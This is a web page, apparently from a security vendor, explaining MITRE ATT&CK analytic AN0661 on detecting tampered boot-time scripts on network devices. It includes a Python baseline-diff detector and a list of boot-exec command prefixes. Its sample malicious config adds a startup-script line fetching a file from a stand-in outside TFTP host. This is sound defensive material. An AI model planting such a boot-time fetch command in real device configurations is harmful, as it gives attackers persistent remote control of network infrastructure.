MITRE ATT&CK® Analytic

AN0661: Analytic 0661

Detection of modified boot-time configuration scripts that persist malicious CLI commands across reboots.

Domain: Enterprise | Object: AN0661 (Analytic) | Object version: 1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This analytic matters because boot-time configuration scripts on network devices can turn a one-time compromise into persistent access that survives reboots. For executives and security leaders, the practical issue is resilience: if routers, switches, firewalls, or other network devices can restart into a malicious state, recovery plans and change-control evidence may be unreliable unless those startup scripts are monitored and validated.

Executive priority

Prioritize this as a network infrastructure integrity and incident recovery control. Leaders should ask whether critical network devices have known-good boot-time configuration baselines, whether unauthorized changes are logged and reviewed, and whether incident response playbooks include validation of startup scripts before returning devices to service. This supports business continuity, auditability of network change management, and confidence that a reboot or replacement action actually removes persistence.

Technical view

The supplied ATT&CK object is a detection analytic for Network Devices focused on identifying modified boot-time configuration scripts that persist malicious CLI commands across reboots. SOC, detection engineering, and IR teams should validate whether they can compare current boot-time scripts or startup configuration artifacts against approved baselines, correlate changes with authorized maintenance activity, and investigate unexpected CLI commands that would execute after reboot. Because no official detection logic is provided, implementation must be environment-specific and based on available device telemetry, configuration archives, and change-management records.

Likely telemetry

  • Network device configuration backups and startup configuration snapshots
  • Boot-time or startup script contents where the platform exposes them
  • Configuration change logs from network devices
  • Administrative CLI command history where available
  • AAA, TACACS/RADIUS, or device login records tied to configuration changes

Detection direction

  • Establish known-good baselines for boot-time configuration scripts and compare new or current versions for unauthorized modifications.
  • Alert on changes to startup or boot-time script locations that are not linked to approved maintenance activity.
  • Review added CLI commands for persistence behavior, especially commands that would execute automatically after reboot.
  • Correlate configuration changes with administrator identity, source address, time window, and change ticket to reduce false positives from legitimate operations.
  • Validate coverage on Network Devices specifically; endpoint or server-focused logging will not prove visibility for this analytic.
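As an added example (not Glexia's or MITRE's code) of the baseline-comparison and change-correlation steps above: it diffs an archived startup configuration against the current snapshot, flags added lines that would run again after reboot, and ranks the change by whether an approved change window covers the administrator and time. The config lines, the boot-time command prefixes and the change record are constructed; a real deployment would substitute the platform's own startup-script syntax and a change-management export.

```python
from collections import namedtuple
from datetime import datetime

# Assumption: commands starting with these prefixes run automatically at boot or
# on a schedule. Constructed placeholders; tune to the real platform's syntax.
BOOT_EXEC_PREFIXES = ("boot ", "startup-script ", "scheduler ")

# One approved maintenance window: who may change what, and when.
ChangeRecord = namedtuple("ChangeRecord", "ticket admin start end")

def diff_config(baseline: str, current: str):
    """Return (added, removed) non-blank lines; order and nesting are ignored."""
    base = {l.strip() for l in baseline.splitlines() if l.strip()}
    cur = {l.strip() for l in current.splitlines() if l.strip()}
    return sorted(cur - base), sorted(base - cur)

def boot_persistent_lines(added):
    """Subset of added lines that would execute again after a reboot."""
    return [l for l in added if l.startswith(BOOT_EXEC_PREFIXES)]

def is_approved(changed_at, admin, records):
    """Approved only if a change window covers both this admin and this time."""
    return any(r.admin == admin and r.start <= changed_at <= r.end for r in records)

def assess(baseline, current, changed_at, admin, records):
    """Rank a startup-config change: unapproved boot-time additions rank highest."""
    added, removed = diff_config(baseline, current)
    persist = boot_persistent_lines(added)
    approved = is_approved(changed_at, admin, records)
    if persist and not approved:
        severity = "high"
    elif (added or removed) and not approved:
        severity = "medium"
    elif persist:
        severity = "review"  # approved window, but still inspect boot-time commands
    else:
        severity = "none"
    return {"added": added, "removed": removed, "boot_persistent": persist,
            "approved": approved, "severity": severity}

# Constructed sample: archived baseline vs. the snapshot taken after a change.
BASELINE = "hostname edge-01\ninterface eth0\n ip address 192.0.2.1/24\nboot system flash:image.bin\n"
CURRENT = BASELINE + "startup-script fetch tftp://198.51.100.9/extra.cfg\n"
RECORDS = [ChangeRecord("CHG-1001", "alice", datetime(2025, 3, 1, 1), datetime(2025, 3, 1, 3))]

def run_sample():
    # Change attributed to 'bob' at 02:00, outside any approved window for him.
    return assess(BASELINE, CURRENT, datetime(2025, 3, 1, 2), "bob", RECORDS)
```

The same change made by the approved administrator inside the window drops to "review" rather than "high", which is the false-positive reduction the correlation step above is meant to deliver.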

Mitigation priorities

  • Define and maintain approved baselines for network device boot-time scripts and startup configurations.
  • Restrict who can modify network device startup configuration artifacts and require authenticated, attributable administrative access.
  • Centralize configuration backups, change logs, and administrative access records for audit and investigation.
  • Integrate network device changes with formal change management so detections can distinguish approved maintenance from suspicious modification.
  • Include boot-time script and startup configuration review in network device incident response and recovery procedures before declaring eradication complete.

Analyst notes and limits

This object is an ATT&CK detection analytic, not a technique entry. It provides a concise detection purpose but no official detection query, tactic mapping, or relationship context. The strongest use is as a control-validation prompt for network infrastructure monitoring: can the organization prove whether boot-time configuration scripts changed, who changed them, and whether the changes persist across reboot?

The official detection field is not provided, tactics are not specified, and no relationships are supplied. This take therefore avoids claims about specific adversaries, active exploitation, exact detection logic, or guaranteed coverage. Local device types, operating systems, configuration storage behavior, and logging capabilities are required to implement and validate this analytic.

Official MITRE ATT&CK definition

Analytic 0661

Detection of modified boot-time configuration scripts that persist malicious CLI commands across reboots.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 010efc08225135a7...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status         | Raw hash
19.1    |                 | 1.0            |          | Current bundle | 010efc082251…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack AN0661

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.